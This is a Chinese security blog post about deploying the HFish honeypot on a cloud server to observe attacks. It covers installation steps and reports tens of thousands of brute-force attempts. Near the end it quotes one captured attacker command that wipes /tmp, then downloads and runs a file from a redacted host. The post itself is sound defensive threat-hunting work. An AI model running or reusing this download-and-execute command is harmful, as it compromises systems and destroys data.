免责声明:本公众号 太乙Sec实验室 所提供的实验环境均是本地搭建,仅限于网络安全研究与学习。旨在为安全爱好者提供技术交流。任何个人或组织因传播、利用本公众号所提供的信息而进行的操作,所导致的直接或间接后果及损失,均由使用者本人负责。太乙Sec实验室及作者对此不承担任何责任
近期,云服务器访问请求异常频繁,因部署了蜜罐获取到相关情报。日志表明,近一周遭数万次疑似黑客爆破攻击,黑客借助自动化工具尝试不同组合突破认证机制,致使资源消耗、性能受影响且账户破解风险增加。同时,安全防护系统监测到多种 Payload 攻击流量,它们利用 FTP 协议漏洞注入恶意数据,妄图执行非法命令、植入恶意软件或获取敏感信息,像绕过验证拿文件、创建后门账号便于后续恶意活动。
实验环境:
|
主机名 |
IP |
账号 |
环境 |
|
xxx |
某云 |
xxx |
HFish |
蜜罐部署
HFish是一款社区型免费蜜罐,侧重企业安全场景,从内网失陷检测、外网威胁感知、威胁情报生产三个场景出发,为用户提供可独立操作且实用的功能,通过安全、敏捷、可靠的中低交互蜜罐增加用户在失陷感知和威胁情报领域的能力。
推荐云服务器搭建部署蜜罐,方便溯源取证
在 Windows 环境中手动部署 HFish 蜜罐管理端的步骤及相关注意事项:
- 下载安装包
:获取 HFish-Windows-amd64 安装包。 - 配置防火墙
:放行 TCP/4433、TCP/4434 端口的出入双向流量,若启用其他蜜罐服务,亦需开启相应端口。 - 安装程序
:解压安装包后,于 HFish-Windows-amd64 目录执行 install.bat,因其将在当前目录安装 HFish,故运行前应确认目录路径无误。 - 登录管理端
:访问登陆链接(如 https://[ip]:4433/web/,默认账号为 admin,密码为 HFish2021),其中 /web/ 路径不可或缺,登录后于「节点管理」页面可查看管理端服务器上的默认节点。
登录Hfish系统后,可通过查看攻击来源并选择威胁平台等级这一操作,实现对海量数据展开排查,进而区分出低、中、高危不同等级的黑客攻击情况,以便能依据这些信息更有针对性地采取相应的应对措施。
黑客爆破日志太多,蜜罐默认库被填满导致很卡,只好换用Mysql
注意更换Mysql部分数据会丢失!!
我们将相关数据下载至本地,使用表格软件打开查看,发现竟存在 2 万多次的爆破记录。
cd /tmp && rm -rf * && wget http://X.X.X.X:1668/t && chmod 777 /tmp/x.t && /tmp/x.t”它试图在 “/tmp” 目录下删除所有文件(“rm -rf *” 是非常危险的操作,可能导致数据丢失)从指定 URL 下载 “x.t” 文件,赋予其可执行权限并执行。//敏感部分已经替换
往期精彩回顾
关注我,了解更多知识,别忘了关注+点赞哦!
原文始发于微信公众号(太乙Sec实验室):技战法:从蜜罐溯源黑客落地到获取Poc
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论